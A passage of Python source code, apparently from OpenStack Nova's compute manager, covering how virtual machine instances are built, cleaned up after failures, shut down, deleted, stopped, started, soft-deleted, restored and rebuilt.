return build_results.RESCHEDULED
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = 'Instance disappeared during build.'
LOG.debug(msg, instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
return build_results.FAILED
except exception.BuildAbortException as e:
LOG.exception(e.format_message(), instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._nil_out_instance_obj_host_and_node(instance)
self._set_instance_obj_error_state(context, instance,
clean_task_state=True)
return build_results.FAILED
except Exception as e:
# Should not reach here.
LOG.exception('Unexpected build failure, not rescheduling build.',
instance=instance)
self._cleanup_allocated_networks(context, instance,
requested_networks)
self._cleanup_volumes(context, instance,
block_device_mapping, raise_exc=False)
compute_utils.add_instance_fault_from_exc(context, instance,
e, sys.exc_info())
self._nil_out_instance_obj_host_and_node(instance)
self._set_instance_obj_error_state(context, instance,
clean_task_state=True)
return build_results.FAILED
def deallocate_sriov_ports_on_reschedule(self, instance):
"""Determine if networks are needed to be deallocated before reschedule
Check the cached network info for any assigned SR-IOV ports.
SR-IOV ports should be deallocated prior to rescheduling
in order to allow new sriov pci devices to be allocated on a new host.
"""
info_cache = instance.info_cache
def _has_sriov_port(vif):
return vif['vnic_type'] in network_model.VNIC_TYPES_SRIOV
if (info_cache and info_cache.network_info):
for vif in info_cache.network_info:
if _has_sriov_port(vif):
return True
return False
@staticmethod
def _get_scheduler_hints(filter_properties, request_spec=None):
"""Helper method to get scheduler hints.
This method prefers to get the hints out of the request spec, but that
might not be provided. Conductor will pass request_spec down to the
first compute chosen for a build but older computes will not pass
        the request_spec to conductor's build_instances method for a
        reschedule, so if we're on a host via a retry, request_spec may not
        be provided, in which case we need to fall back to the
        filter_properties to get scheduler hints.
"""
hints = {}
if request_spec is not None and 'scheduler_hints' in request_spec:
hints = request_spec.scheduler_hints
if not hints:
hints = filter_properties.get('scheduler_hints') or {}
return hints
def _build_and_run_instance(self, context, instance, image, injected_files,
admin_password, requested_networks, security_groups,
block_device_mapping, node, limits, filter_properties,
request_spec=None):
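        # Claim resources on this host, set up networking and block devices,
        # then ask the virt driver to spawn the guest. Failures are mapped to
        # either RescheduledException (retry elsewhere) or BuildAbortException
        # (fail the build outright) for _do_build_and_run_instance to handle.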
image_name = image.get('name')
self._notify_about_instance_usage(context, instance, 'create.start',
extra_usage_info={'image_name': image_name})
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.START,
bdms=block_device_mapping)
# NOTE(mikal): cache the keystone roles associated with the instance
# at boot time for later reference
instance.system_metadata.update(
{'boot_roles': ','.join(context.roles)[:255]})
self._check_device_tagging(requested_networks, block_device_mapping)
try:
scheduler_hints = self._get_scheduler_hints(filter_properties,
request_spec)
rt = self._get_resource_tracker()
with rt.instance_claim(context, instance, node, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
scheduler_hints)
image_meta = objects.ImageMeta.from_dict(image)
with self._build_resources(context, instance,
requested_networks, security_groups, image_meta,
block_device_mapping) as resources:
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SPAWNING
# NOTE(JoshNang) This also saves the changes to the
# instance from _allocate_network_async, as they aren't
# saved in that function to prevent races.
instance.save(expected_task_state=
task_states.BLOCK_DEVICE_MAPPING)
block_device_info = resources['block_device_info']
network_info = resources['network_info']
allocs = resources['allocations']
LOG.debug('Start spawning the instance on the hypervisor.',
instance=instance)
with timeutils.StopWatch() as timer:
self.driver.spawn(context, instance, image_meta,
injected_files, admin_password,
allocs, network_info=network_info,
block_device_info=block_device_info)
LOG.info('Took %0.2f seconds to spawn the instance on '
'the hypervisor.', timer.elapsed(),
instance=instance)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
except exception.ComputeResourcesUnavailable as e:
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=e.format_message())
except exception.BuildAbortException as e:
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
except (exception.FixedIpLimitExceeded,
exception.NoMoreNetworks, exception.NoMoreFixedIps) as e:
LOG.warning('No more network or fixed IP to be allocated',
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
msg = _('Failed to allocate the network(s) with error %s, '
'not rescheduling.') % e.format_message()
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.VirtualInterfaceCreateException,
exception.VirtualInterfaceMacAddressException,
exception.FixedIpInvalidOnHost,
exception.UnableToAutoAllocateNetwork) as e:
LOG.exception('Failed to allocate network(s)',
instance=instance)
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
except (exception.FlavorDiskTooSmall,
exception.FlavorMemoryTooSmall,
exception.ImageNotActive,
exception.ImageUnacceptable,
exception.InvalidDiskInfo,
exception.InvalidDiskFormat,
cursive_exception.SignatureVerificationError,
exception.VolumeEncryptionNotSupported,
exception.InvalidInput,
# TODO(mriedem): We should be validating RequestedVRamTooHigh
# in the API during server create and rebuild.
exception.RequestedVRamTooHigh) as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception as e:
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
raise exception.RescheduledException(
instance_uuid=instance.uuid, reason=six.text_type(e))
# NOTE(alaski): This is only useful during reschedules, remove it now.
instance.system_metadata.pop('network_allocated', None)
# If CONF.default_access_ip_network_name is set, grab the
# corresponding network and set the access ip values accordingly.
network_name = CONF.default_access_ip_network_name
if (network_name and not instance.access_ip_v4 and
not instance.access_ip_v6):
# Note that when there are multiple ips to choose from, an
# arbitrary one will be chosen.
for vif in network_info:
if vif['network']['label'] == network_name:
for ip in vif.fixed_ips():
if not instance.access_ip_v4 and ip['version'] == 4:
instance.access_ip_v4 = ip['address']
if not instance.access_ip_v6 and ip['version'] == 6:
instance.access_ip_v6 = ip['address']
break
self._update_instance_after_spawn(context, instance)
try:
instance.save(expected_task_state=task_states.SPAWNING)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError) as e:
with excutils.save_and_reraise_exception():
self._notify_about_instance_usage(context, instance,
'create.error', fault=e)
compute_utils.notify_about_instance_create(
context, instance, self.host,
phase=fields.NotificationPhase.ERROR, exception=e,
bdms=block_device_mapping)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'create.end',
extra_usage_info={'message': _('Success')},
network_info=network_info)
compute_utils.notify_about_instance_create(context, instance,
self.host, phase=fields.NotificationPhase.END,
bdms=block_device_mapping)
@contextlib.contextmanager
def _build_resources(self, context, instance, requested_networks,
security_groups, image_meta, block_device_mapping):
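        # Context manager that allocates networks, block devices and placement
        # allocation data for the build, yields them to the caller, and tears
        # the instance back down if spawning fails inside the managed block.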
resources = {}
network_info = None
try:
LOG.debug('Start building networks asynchronously for instance.',
instance=instance)
network_info = self._build_networks_for_instance(context, instance,
requested_networks, security_groups)
resources['network_info'] = network_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
raise
except exception.UnexpectedTaskStateError as e:
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
            # Because this allocation is async, any failures are likely to
            # occur when the driver accesses network_info during spawn().
LOG.exception('Failed to allocate network(s)',
instance=instance)
msg = _('Failed to allocate the network(s), not rescheduling.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
# Depending on a virt driver, some network configuration is
# necessary before preparing block devices.
self.driver.prepare_networks_before_block_device_mapping(
instance, network_info)
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(instance, image_meta,
block_device_mapping)
LOG.debug('Start building block device mappings for instance.',
instance=instance)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(context, instance,
block_device_mapping)
resources['block_device_info'] = block_device_info
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
with excutils.save_and_reraise_exception():
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
self.driver.clean_networks_preparation(instance,
network_info)
except (exception.UnexpectedTaskStateError,
exception.OverQuota, exception.InvalidBDM,
exception.QuotaError) as e:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
self.driver.clean_networks_preparation(instance, network_info)
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=e.format_message())
except Exception:
LOG.exception('Failure prepping block device',
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
self.driver.clean_networks_preparation(instance, network_info)
msg = _('Failure prepping block device.')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
resources['allocations'] = (
self.reportclient.get_allocations_for_consumer(context,
instance.uuid))
except Exception:
LOG.exception('Failure retrieving placement allocations',
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
msg = _('Failure retrieving placement allocations')
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
try:
yield resources
except Exception as exc:
with excutils.save_and_reraise_exception() as ctxt:
if not isinstance(exc, (
exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError)):
LOG.exception('Instance failed to spawn',
instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
# if network_info is empty we're likely here because of
# network allocation failure. Since nothing can be reused on
# rescheduling it's better to deallocate network to eliminate
# the chance of orphaned ports in neutron
                deallocate_networks = not network_info
try:
self._shutdown_instance(context, instance,
block_device_mapping, requested_networks,
try_deallocate_networks=deallocate_networks)
except Exception as exc2:
ctxt.reraise = False
LOG.warning('Could not clean up failed build,'
' not rescheduling. Error: %s',
six.text_type(exc2))
raise exception.BuildAbortException(
instance_uuid=instance.uuid,
reason=six.text_type(exc))
def _cleanup_allocated_networks(self, context, instance,
requested_networks):
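        # Best-effort network teardown after a failed or aborted build; also
        # records that networking is no longer allocated for any later
        # reschedule.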
try:
self._deallocate_network(context, instance, requested_networks)
except Exception:
LOG.exception('Failed to deallocate networks', instance=instance)
return
instance.system_metadata['network_allocated'] = 'False'
try:
instance.save()
except exception.InstanceNotFound:
# NOTE(alaski): It's possible that we're cleaning up the networks
# because the instance was deleted. If that's the case then this
# exception will be raised by instance.save()
pass
def _try_deallocate_network(self, context, instance,
requested_networks=None):
try:
# tear down allocated network structure
self._deallocate_network(context, instance, requested_networks)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.error('Failed to deallocate network for instance. '
'Error: %s', ex, instance=instance)
self._set_instance_obj_error_state(context, instance)
def _get_power_off_values(self, context, instance, clean_shutdown):
"""Get the timing configuration for powering down this instance."""
if clean_shutdown:
timeout = compute_utils.get_value_from_system_metadata(instance,
key='image_os_shutdown_timeout', type=int,
default=CONF.shutdown_timeout)
retry_interval = self.SHUTDOWN_RETRY_INTERVAL
else:
timeout = 0
retry_interval = 0
return timeout, retry_interval
def _power_off_instance(self, context, instance, clean_shutdown=True):
"""Power off an instance on this host."""
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
self.driver.power_off(instance, timeout, retry_interval)
def _shutdown_instance(self, context, instance,
bdms, requested_networks=None, notify=True,
try_deallocate_networks=True):
"""Shutdown an instance on this host.
:param:context: security context
:param:instance: a nova.objects.Instance object
:param:bdms: the block devices for the instance to be torn
down
:param:requested_networks: the networks on which the instance
has ports
:param:notify: true if a final usage notification should be
emitted
:param:try_deallocate_networks: false if we should avoid
trying to teardown networking
"""
context = context.elevated()
LOG.info('Terminating instance', instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHUTDOWN,
phase=fields.NotificationPhase.START, bdms=bdms)
network_info = instance.get_network_info()
# NOTE(vish) get bdms before destroying the instance
vol_bdms = [bdm for bdm in bdms if bdm.is_volume]
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
# NOTE(melwitt): attempt driver destroy before releasing ip, may
# want to keep ip allocated for certain failures
timer = timeutils.StopWatch()
try:
LOG.debug('Start destroying the instance on the hypervisor.',
instance=instance)
timer.start()
self.driver.destroy(context, instance, network_info,
block_device_info)
LOG.info('Took %0.2f seconds to destroy the instance on the '
'hypervisor.', timer.elapsed(), instance=instance)
except exception.InstancePowerOffFailure:
# if the instance can't power off, don't release the ip
with excutils.save_and_reraise_exception():
pass
except Exception:
with excutils.save_and_reraise_exception():
# deallocate ip and fail without proceeding to
# volume api calls, preserving current behavior
if try_deallocate_networks:
self._try_deallocate_network(context, instance,
requested_networks)
if try_deallocate_networks:
self._try_deallocate_network(context, instance, requested_networks)
timer.restart()
for bdm in vol_bdms:
try:
if bdm.attachment_id:
self.volume_api.attachment_delete(context,
bdm.attachment_id)
else:
# NOTE(vish): actual driver detach done in driver.destroy,
# so just tell cinder that we are done with it.
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context,
bdm.volume_id,
connector)
self.volume_api.detach(context, bdm.volume_id,
instance.uuid)
except exception.VolumeAttachmentNotFound as exc:
LOG.debug('Ignoring VolumeAttachmentNotFound: %s', exc,
instance=instance)
except exception.DiskNotFound as exc:
LOG.debug('Ignoring DiskNotFound: %s', exc,
instance=instance)
except exception.VolumeNotFound as exc:
LOG.debug('Ignoring VolumeNotFound: %s', exc,
instance=instance)
except (cinder_exception.EndpointNotFound,
keystone_exception.EndpointNotFound) as exc:
LOG.warning('Ignoring EndpointNotFound for '
'volume %(volume_id)s: %(exc)s',
{'exc': exc, 'volume_id': bdm.volume_id},
instance=instance)
except cinder_exception.ClientException as exc:
LOG.warning('Ignoring unknown cinder exception for '
'volume %(volume_id)s: %(exc)s',
{'exc': exc, 'volume_id': bdm.volume_id},
instance=instance)
except Exception as exc:
LOG.warning('Ignoring unknown exception for '
'volume %(volume_id)s: %(exc)s',
{'exc': exc, 'volume_id': bdm.volume_id},
instance=instance)
if vol_bdms:
LOG.info('Took %(time).2f seconds to detach %(num)s volumes '
'for instance.',
{'time': timer.elapsed(), 'num': len(vol_bdms)},
instance=instance)
if notify:
self._notify_about_instance_usage(context, instance,
"shutdown.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SHUTDOWN,
phase=fields.NotificationPhase.END, bdms=bdms)
def _cleanup_volumes(self, context, instance, bdms, raise_exc=True,
detach=True):
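        # Detach each volume and, where delete_on_termination is set, delete
        # it, remembering the last failure so it can optionally be re-raised
        # once every BDM has been processed.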
exc_info = None
for bdm in bdms:
if detach and bdm.volume_id:
try:
LOG.debug("Detaching volume: %s", bdm.volume_id,
instance_uuid=instance.uuid)
destroy = bdm.delete_on_termination
self._detach_volume(context, bdm, instance,
destroy_bdm=destroy)
except Exception as exc:
exc_info = sys.exc_info()
LOG.warning('Failed to detach volume: %(volume_id)s '
'due to %(exc)s',
{'volume_id': bdm.volume_id, 'exc': exc})
if bdm.volume_id and bdm.delete_on_termination:
try:
LOG.debug("Deleting volume: %s", bdm.volume_id,
instance_uuid=instance.uuid)
self.volume_api.delete(context, bdm.volume_id)
except Exception as exc:
exc_info = sys.exc_info()
LOG.warning('Failed to delete volume: %(volume_id)s '
'due to %(exc)s',
{'volume_id': bdm.volume_id, 'exc': exc})
if exc_info is not None and raise_exc:
six.reraise(exc_info[0], exc_info[1], exc_info[2])
@hooks.add_hook("delete_instance")
def _delete_instance(self, context, instance, bdms):
"""Delete an instance on this host.
:param context: nova request context
:param instance: nova.objects.instance.Instance object
:param bdms: nova.objects.block_device.BlockDeviceMappingList object
"""
events = self.instance_events.clear_events_for_instance(instance)
if events:
LOG.debug('Events pending at deletion: %(events)s',
{'events': ','.join(events.keys())},
instance=instance)
self._notify_about_instance_usage(context, instance,
"delete.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.DELETE,
phase=fields.NotificationPhase.START, bdms=bdms)
self._shutdown_instance(context, instance, bdms)
# NOTE(dims): instance.info_cache.delete() should be called after
# _shutdown_instance in the compute manager as shutdown calls
# deallocate_for_instance so the info_cache is still needed
# at this point.
if instance.info_cache is not None:
instance.info_cache.delete()
else:
# NOTE(yoshimatsu): Avoid AttributeError if instance.info_cache
# is None. When the root cause that instance.info_cache becomes
# None is fixed, the log level should be reconsidered.
LOG.warning("Info cache for instance could not be found. "
"Ignore.", instance=instance)
# NOTE(vish): We have already deleted the instance, so we have
# to ignore problems cleaning up the volumes. It
# would be nice to let the user know somehow that
# the volume deletion failed, but it is not
# acceptable to have an instance that can not be
# deleted. Perhaps this could be reworked in the
# future to set an instance fault the first time
# and to only ignore the failure if the instance
# is already in ERROR.
        # NOTE(ameeda): The volumes were already detached during the above
        #               _shutdown_instance() call, which is why detach is
        #               not requested from _cleanup_volumes() in this case.
self._cleanup_volumes(context, instance, bdms,
raise_exc=False, detach=False)
# if a delete task succeeded, always update vm state and task
# state without expecting task state to be DELETING
instance.vm_state = vm_states.DELETED
instance.task_state = None
instance.power_state = power_state.NOSTATE
instance.terminated_at = timeutils.utcnow()
instance.save()
system_meta = instance.system_metadata
instance.destroy()
self._complete_deletion(context,
instance,
bdms,
system_meta)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def terminate_instance(self, context, instance, bdms):
"""Terminate an instance on this host."""
@utils.synchronized(instance.uuid)
def do_terminate_instance(instance, bdms):
# NOTE(mriedem): If we are deleting the instance while it was
# booting from volume, we could be racing with a database update of
# the BDM volume_id. Since the compute API passes the BDMs over RPC
# to compute here, the BDMs may be stale at this point. So check
# for any volume BDMs that don't have volume_id set and if we
# detect that, we need to refresh the BDM list before proceeding.
# TODO(mriedem): Move this into _delete_instance and make the bdms
# parameter optional.
for bdm in list(bdms):
if bdm.is_volume and not bdm.volume_id:
LOG.debug('There are potentially stale BDMs during '
'delete, refreshing the BlockDeviceMappingList.',
instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
break
try:
self._delete_instance(context, instance, bdms)
except exception.InstanceNotFound:
LOG.info("Instance disappeared during terminate",
instance=instance)
except Exception:
# As we're trying to delete always go to Error if something
# goes wrong that _delete_instance can't handle.
with excutils.save_and_reraise_exception():
LOG.exception('Setting instance vm_state to ERROR',
instance=instance)
self._set_instance_obj_error_state(context, instance)
do_terminate_instance(instance, bdms)
# NOTE(johannes): This is probably better named power_off_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def stop_instance(self, context, instance, clean_shutdown):
"""Stopping an instance on this host."""
@utils.synchronized(instance.uuid)
def do_stop_instance():
current_power_state = self._get_power_state(context, instance)
LOG.debug('Stopping instance; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, current VM '
'power_state: %(current_power_state)s',
{'vm_state': instance.vm_state,
'task_state': instance.task_state,
'db_power_state': instance.power_state,
'current_power_state': current_power_state},
instance_uuid=instance.uuid)
# NOTE(mriedem): If the instance is already powered off, we are
# possibly tearing down and racing with other operations, so we can
# expect the task_state to be None if something else updates the
# instance and we're not locking it.
expected_task_state = [task_states.POWERING_OFF]
# The list of power states is from _sync_instance_power_state.
if current_power_state in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.info('Instance is already powered off in the '
'hypervisor when stop is called.',
instance=instance)
expected_task_state.append(None)
self._notify_about_instance_usage(context, instance,
"power_off.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.POWER_OFF,
phase=fields.NotificationPhase.START)
self._power_off_instance(context, instance, clean_shutdown)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.STOPPED
instance.task_state = None
instance.save(expected_task_state=expected_task_state)
self._notify_about_instance_usage(context, instance,
"power_off.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.POWER_OFF,
phase=fields.NotificationPhase.END)
do_stop_instance()
def _power_on(self, context, instance):
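        # Refresh network and block device info before asking the driver to
        # power the instance back on.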
network_info = self.network_api.get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.power_on(context, instance,
network_info,
block_device_info)
def _delete_snapshot_of_shelved_instance(self, context, instance,
snapshot_id):
"""Delete snapshot of shelved instance."""
try:
self.image_api.delete(context, snapshot_id)
except (exception.ImageNotFound,
exception.ImageNotAuthorized) as exc:
LOG.warning("Failed to delete snapshot "
"from shelved instance (%s).",
exc.format_message(), instance=instance)
except Exception:
LOG.exception("Something wrong happened when trying to "
"delete snapshot from shelved instance.",
instance=instance)
# NOTE(johannes): This is probably better named power_on_instance
# so it matches the driver method, but because of other issues, we
# can't use that name in grizzly.
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def start_instance(self, context, instance):
"""Starting an instance on this host."""
self._notify_about_instance_usage(context, instance, "power_on.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.POWER_ON,
phase=fields.NotificationPhase.START)
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
# Delete an image(VM snapshot) for a shelved instance
snapshot_id = instance.system_metadata.get('shelved_image_id')
if snapshot_id:
self._delete_snapshot_of_shelved_instance(context, instance,
snapshot_id)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.POWERING_ON)
self._notify_about_instance_usage(context, instance, "power_on.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.POWER_ON,
phase=fields.NotificationPhase.END)
@messaging.expected_exceptions(NotImplementedError,
exception.TriggerCrashDumpNotSupported,
exception.InstanceNotRunning)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def trigger_crash_dump(self, context, instance):
"""Trigger crash dump in an instance."""
self._notify_about_instance_usage(context, instance,
"trigger_crash_dump.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.TRIGGER_CRASH_DUMP,
phase=fields.NotificationPhase.START)
        # This method does not change task_state and power_state because the
        # effect of a trigger depends on the user's configuration.
self.driver.trigger_crash_dump(instance)
self._notify_about_instance_usage(context, instance,
"trigger_crash_dump.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.TRIGGER_CRASH_DUMP,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def soft_delete_instance(self, context, instance):
"""Soft delete an instance on this host."""
with compute_utils.notify_about_instance_delete(
self.notifier, context, instance, 'soft_delete'):
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.SOFT_DELETE,
phase=fields.NotificationPhase.START)
try:
self.driver.soft_delete(instance)
except NotImplementedError:
                # Fall back to just powering off the instance if the
                # hypervisor doesn't implement the soft_delete method.
self.driver.power_off(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SOFT_DELETED
instance.task_state = None
instance.save(expected_task_state=[task_states.SOFT_DELETING])
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.SOFT_DELETE,
phase=fields.NotificationPhase.END)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def restore_instance(self, context, instance):
"""Restore a soft-deleted instance on this host."""
self._notify_about_instance_usage(context, instance, "restore.start")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESTORE,
phase=fields.NotificationPhase.START)
try:
self.driver.restore(instance)
except NotImplementedError:
            # Fall back to just powering on the instance if the hypervisor
            # doesn't implement the restore method.
self._power_on(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.RESTORING)
self._notify_about_instance_usage(context, instance, "restore.end")
compute_utils.notify_about_instance_action(context, instance,
self.host, action=fields.NotificationAction.RESTORE,
phase=fields.NotificationPhase.END)
@staticmethod
def _set_migration_status(migration, status):
"""Set the status, and guard against a None being passed in.
This is useful as some of the compute RPC calls will not pass
a migration object in older versions. The check can be removed when
we move past 4.x major version of the RPC API.
"""
if migration:
migration.status = status
migration.save()
def _rebuild_default_impl(self, context, instance, image_meta,
injected_files, admin_password, allocations,
bdms, detach_block_devices, attach_block_devices,
network_info=None,
recreate=False, block_device_info=None,
preserve_ephemeral=False):
if preserve_ephemeral:
# The default code path does not support preserving ephemeral
# partitions.
raise exception.PreserveEphemeralNotSupported()
if recreate:
detach_block_devices(context, bdms)
else:
self._power_off_instance(context, instance, clean_shutdown=True)
detach_block_devices(context, bdms)
self.driver.destroy(context, instance,
network_info=network_info,
block_device_info=block_device_info)
instance.task_state = task_states.REBUILD_BLOCK_DEVICE_MAPPING
instance.save(expected_task_state=[task_states.REBUILDING])
new_block_device_info = attach_block_devices(context, instance, bdms)
instance.task_state = task_states.REBUILD_SPAWNING
instance.save(
expected_task_state=[task_states.REBUILD_BLOCK_DEVICE_MAPPING])
with instance.mutated_migration_context():
self.driver.spawn(context, instance, image_meta, injected_files,
admin_password, allocations,
network_info=network_info,
block_device_info=new_block_device_info)
def _notify_instance_rebuild_error(self, context, instance, error, bdms):
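        # Emit both the legacy 'rebuild.error' usage notification and the
        # versioned REBUILD/ERROR notification for a failed rebuild.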
self._notify_about_instance_usage(context, instance,
'rebuild.error', fault=error)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.REBUILD,
phase=fields.NotificationPhase.ERROR, exception=error, bdms=bdms)
@messaging.expected_exceptions(exception.PreserveEphemeralNotSupported)
@wrap_exception()
@reverts_task_state
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral, migration,
scheduled_node, limits, request_spec):
"""Destroy and re-make this instance.
A 'rebuild' effectively purges all existing data from the system and
remakes the VM with given 'metadata' and 'personalities'.
:param context: `nova.RequestContext` object
:param instance: Instance object
:param orig_image_ref: Original image_ref before rebuild
:param image_ref: New image_ref for rebuild
:param injected_files: Files to inject
:param new_pass: password to set on rebuilt instance
:param orig_sys_metadata: instance system metadata from pre-rebuild
:param bdms: block-device-mappings to use for rebuild
:param recreate: True if the instance is being recreated (e.g. the
hypervisor it was on failed) - cleanup of old state will be
skipped.
:param on_shared_storage: True if instance files on shared storage.
If not provided then information from the
driver will be used to decide if the instance
files are available or not on the target host
:param preserve_ephemeral: True if the default ephemeral storage
partition must be preserved on rebuild
:param migration: a Migration object if one was created for this
rebuild operation (if it's a part of evacuate)
:param scheduled_node: A node of the host chosen by the scheduler. If a
host was specified by the user, this will be
None
:param limits: Overcommit limits set by the scheduler. If a host was
specified by the user, this will be None
:param request_spec: a RequestSpec object used to schedule the instance
"""
context = context.elevated()
LOG.info("Rebuilding instance", instance=instance)
rt = self._get_resource_tracker()
if recreate:
# This is an evacuation to a new host, so we need to perform a
# resource claim.
rebuild_claim = rt.rebuild_claim
else:
# This is a rebuild to the same host, so we don't need to make
# a claim since the instance is already on this host.
rebuild_claim = claims.NopClaim
image_meta = {}
if image_ref:
image_meta = self.image_api.get(context, image_ref)
# NOTE(mriedem): On a recreate (evacuate), we need to update
        # the instance's host and node properties to reflect its
        # destination node for the recreate.
if not scheduled_node:
if recreate:
try:
compute_node = self._get_compute_info(context, self.host)
scheduled_node = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception('Failed to get compute_info for %s',
self.host)
else:
scheduled_node = instance.node
with self._error_out_instance_on_exception(context, instance):
try:
claim_ctxt = rebuild_claim(
context, instance, scheduled_node,
limits=limits, image_meta=image_meta,
migration=migration)
self._do_rebuild_instance_with_claim(
claim_ctxt, context, instance, orig_image_ref,
image_ref, injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage, preserve_ephemeral,
migration, request_spec)
except (exception.ComputeResourcesUnavailable,
exception.RescheduledException) as e:
if isinstance(e, exception.ComputeResourcesUnavailable):
